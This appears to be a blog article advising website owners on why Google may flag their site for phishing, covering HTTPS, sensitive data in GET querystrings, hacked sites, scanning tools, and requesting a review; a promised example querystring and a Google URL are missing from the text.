Most responsible website owners would never dream of creating phishing pages. Google actively searches the web for potential phishing and flags sites thought to host malicious pages. Some site owners wake up to a message in search that their site is flagged as a phishing portal. Honest site owners don’t know what’s considered phishing, so they panic and immediately try to have the site reviewed. Having your site flagged isn’t the end of the world, but you do need to clean up pages before you can have a successful review. A successful review removes the warning from Google search results, so it’s in imperative that you act fast. Here are the why, how, and what you can do to fix a phishing flag placed on your site.
Understand What Constitutes Phishing
You might not even know that your pages are considered phishing portals. The first thing to ask yourself is what pages could be considered phishing. The first red flag is a site that doesn’t use SSL or TLS on their web server but retrieves personal data. SSL (and now the newer TLS) are certificates you install on your web server. The certificates allow you to provide encryption between your site and client’s browser. SSL certificates provide your site with the ability to use HTTPS as the protocol, which protects against eavesdroppers.
Go through your pages and identify if any of them ask for personal information. If a user lands on your page using HTTP, he should be redirected to the HTTPS version of the page before entering private information.
Another possibility is how you process data. When you submit data from a web page form, it sends data either in a form POST or GET action. The GET action sends data in the browser’s querystring values. You’ve probably seen web pages with a question mark and variables appended at the end of the page name. Querystring values look like the following:
The querystring is everything after the question mark. In this example, a user’s first and last name is passed to a processing page. What if the querystring contained a social security or bank account number? This is considered insecure. When hackers use phishing methods, they are generally sloppy in how they set up pages. For this reason, poorly secured or programmed sites are considered suspicious and flagged.
Another common and much more difficult problem to identify is a hacked site. Hackers who gain access to your site place phishing pages on the domain without your knowledge. This makes it much more difficult to track and identify the phishing page.
You can use a crawler that looks specifically for hacked content. For instance, AWSnap (aw-snap.info/file-viewer/) is one site that crawls specific pages, identifies any suspicious code and gives you suggestions. Another tool is Securi.net. This tool also lets you subscribe for a fee and use it to automatically crawl your site at a specific rate. If any suspicious files are found, Securi sends you a notification.
If you can’t find the hacked pages, you’ll need to hire a professional. Google won’t remove the warning until any phishing content is removed from your domain.
In rare occasions, your site might be incorrectly flagged. If this is the case, you can request a review and explain. Google also provides this URL for reporting incorrectly flagged sites:
You should also know that Google has different levels for warnings. The most common form of a phishing notification is “Deceptive site ahead.” The message is displayed in the Chrome and Firefox browsers. If Google believes you host malware, the warning indicates that a site could harm a computer or contains malware.